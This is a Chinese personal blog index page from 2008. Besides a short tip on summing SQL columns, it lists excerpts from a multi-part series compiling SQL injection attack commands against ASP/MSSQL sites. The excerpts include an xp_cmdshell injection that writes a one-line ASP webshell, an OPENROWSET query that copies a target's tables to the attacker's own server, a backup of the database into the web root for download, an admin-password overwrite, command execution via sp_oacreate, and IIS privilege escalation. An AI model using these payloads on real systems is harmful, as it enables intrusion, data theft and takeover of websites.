叮咛你站在桥上看风景,看风景的人在楼上看你。明月装饰了你的窗子,你装饰了别人的梦。

博客首页 本站声明 申请链接 在线留言 关于站长 免费注册
  • 2008-12-01

    使用sql语句对多个列进行求和 - [系统&数据库]

    使用sql语句对多个列进行求和.

    sum语句的基本用法是:select sum(列名) as A_Name from Table_Name where ...

    这样只能计算出某一列的数值的和;

    如果要求多列的和,则可用:select sum(列名1+列名2+列名n) as A_Name from Table_Name where...
    Tag:sql 求和 sum
    叮咛 发表于23:35 | 阅读全文 | 评论 0 | 编辑 | 分享 0
  • 2008-11-10

    最详细的SQL注入相关的命令整理(七) - [ASP&VB]

    33、DB_OWNER权限下的数据库备份方法
    用openrowset吧。反连到自己的数据库机器,~先在本地建个跟目标机器一样结构的表~字段类型使用nvarchar.然后用海洋连接对方的SQL数据库,在查询分析那里执行
    insert into OPENROWSET ('sqloledb','server=你数据库服务器的IP;uid=user;pwd=pass;database=dbname;', 'select * from 你建立的表) select * from 对方的表&m...
    Tag:SQL 注入 命令
    叮咛 发表于11:37 | 阅读全文 | 评论 0 | 编辑 | 分享 0
  • 2008-11-10

    最详细的SQL注入相关的命令整理(六) - [ASP&VB]

    30、sa 权限下已知web路径直接备份数据库到web路径下

    http://www.XXXX.com/FullStory.asp?id=1;backuup database 数据库名 to disk='c:\inetpub\wwwroot\save.db' 则把得到的数据内容全部备份到WEB目录下,再用HTTP把此文件下载(当然首选要知道WEB虚拟目录)。

    ? 遍历系统的目录结构,分析结果并发现WEB虚拟目录,先创建一个临时表:temp
    http...
    Tag:SQL 注入 命令
    叮咛 发表于11:35 | 阅读全文 | 评论 0 | 编辑 | 分享 0
  • 2008-11-10

    最详细的SQL注入相关的命令整理(五) - [ASP&VB]

    21、win2000下将WEB用户提升为系统用户权限,需要有管理员的权限才能执行:
    c:\>cscript C:\Inetpub\AdminScripts\adsutil.vbs set /W3SVC/InProcessIsapiApps "C:\WINNT\system32\idq.dll" "C:\WINNT\system32\inetsrv\httpext.dll" "C:\WINNT\system32\inetsrv\http...
    Tag:SQL 注入 命令
    叮咛 发表于11:32 | 阅读全文 | 评论 0 | 编辑 | 分享 0
  • 2008-11-10

    最详细的SQL注入相关的命令整理(四) - [ASP&VB]

    20、寻找网站路径的方法汇总:
    1)查看WEB网站安装目录命令:
    ? cscript c:\inetpub\adminscripts\adsutil.vbs enum w3svc/2/root >c:\test1.txt (将2换成1、3、4、5试试)
    type c:\test1.txt
    del c:\test1.txt
    在NBSI下可以直接显示运行结果,所以不用导出到文件

    2)在网站上随便找到一个图片的名字 123.jp...
    Tag:SQL 注入 命令
    叮咛 发表于11:31 | 阅读全文 | 评论 0 | 编辑 | 分享 0
  • 2008-11-10

    最详细的SQL注入相关的命令整理(三) - [ASP&VB]

    9、 用update来更新表中的数据:
    HTTP://xxx.xxx.xxx/abc.asp?p=YY;update upload.dbo.admin set pwd='a0b923820dcc509a' where username='www';--
    www用户密码的16位MD5值为:a0b923820dcc509a,即把密码改成1;
    32位MD5值为: ,密码为

    10、 利用表内容导成文件功能
    SQL有BCP命令,它可以把表的内容导成...
    Tag:SQL 注入 命令
    叮咛 发表于11:28 | 阅读全文 | 评论 0 | 编辑 | 分享 0
  • 2008-11-10

    最详细的SQL注入相关的命令整理(二) - [ASP&VB]

    8、 不需xp_cmdshell支持在有注入漏洞的SQL服务器上运行CMD命令:
    create TABLE mytmp(info VARCHAR(400),ID int IDENTITY(1,1) NOT NULL)
    DECLARE @shell INT
    DECLARE @fso INT
    DECLARE @file INT
    DECLARE @isEnd BIT
    DECLARE @out VARCHAR(400)
    EXEC sp_o...
    Tag:SQL 注入 命令
    叮咛 发表于11:26 | 阅读全文 | 评论 0 | 编辑 | 分享 0
  • 2008-11-10

    最详细的SQL注入相关的命令整理(一) - [ASP&VB]

    1、 用^转义字符来写ASP(一句话木马)文件的方法:
    ? http://192.168.1.5/display.asp?keyno=1881;exec master.dbo.xp_cmdshell 'echo ^<script language=VBScript runat=server^>execute request^("l"^)^</script^> >c:\mu.asp';--

    ? echo ^<%ex...
    Tag:SQL 注入 命令
    叮咛 发表于11:16 | 阅读全文 | 评论 0 | 编辑 | 分享 0
共3页 1 2 3 下一页 最后一页

关于站长

叮咛

赤峰克旗人,非计算机专业出身的网页设计师、ASP、.NET程序员,精通XHTML+CSS标准布局!

最新日志

  • 2008年年末到2009年年初总结
  • 听一个人的彩铃,记录一首歌
  • 很强的js相册
  • 忙
  • 慎用On Error Resume Next
  • asp中获取字符串中的时间字符串
  • 使用sql语句对多个列进行求和
  • js控制文本框只能输入数字
  • 天下最美-克什克腾旗(视频)
  • ASP编程隐藏图片的真实地址
全部日志>>

文章分类

  • 赤峰&个人[39]
  • 小说&网摘[22]
  • 职场&人生[12]
  • 安全&入侵[47]
  • 优化&特效[41]
  • 算法&程序[51]
  • ASP&VB[80]
  • .Net&C#[83]
  • XHTML&CSS[8]
  • PS&色廊[12]
  • 系统&数据库[53]
  • 英文&词汇[11]

最新评论

  • leeo2018:恐怖的加班!
  • 桂荣:谢什么,真是的。
  • 桂荣:为什么不用正则过滤呢,感觉这种阻止用户切换输入法,体验性...
  • rong179:唉,我也是非计算机专业,但对前端开发热爱,真不知怎么走。...
  • 网站建设:我的电脑老是有病毒,不知道怎么回事,NND,气死我了,有...
  • 网站制作:地球人都知道!
  • 平凡人:整理的很详细,很有心,很值得学习....
  • leo:好啊,哥们~~我的qq2675701,msn因为人很少,...
  • rong179:呵呵,谢什么,一起交流,一起学习嘛。通过这篇文章,我才认...
  • rong179:layout-flow:horizontal|verti...

本站链接

  • 赤峰百姓网
  • 黑马在线动力
  • 零度非主流
  • 失去记忆
  • CSSPLAY
  • W3C
  • w3school
  • 蓝色理想
  • TechNet主页(中国)
  • MSDN-.Net
  • MSDN主页(中国)
  • MySpace
  • exploding-boy
  • Red Gate
  • Prototype
  • 网页设计师
  • CSDN读书频道
  • 网站历史页面查询
  • [申请本站链接]

文章搜索

本站声明

  根据个人需要,转载了部分文章,如有侵权,请与我联系。站长:叮咛
  • 叮咛
Copyright © 2002-2008 E5bar.com, All Rights Reserved. 叮咛 版权所有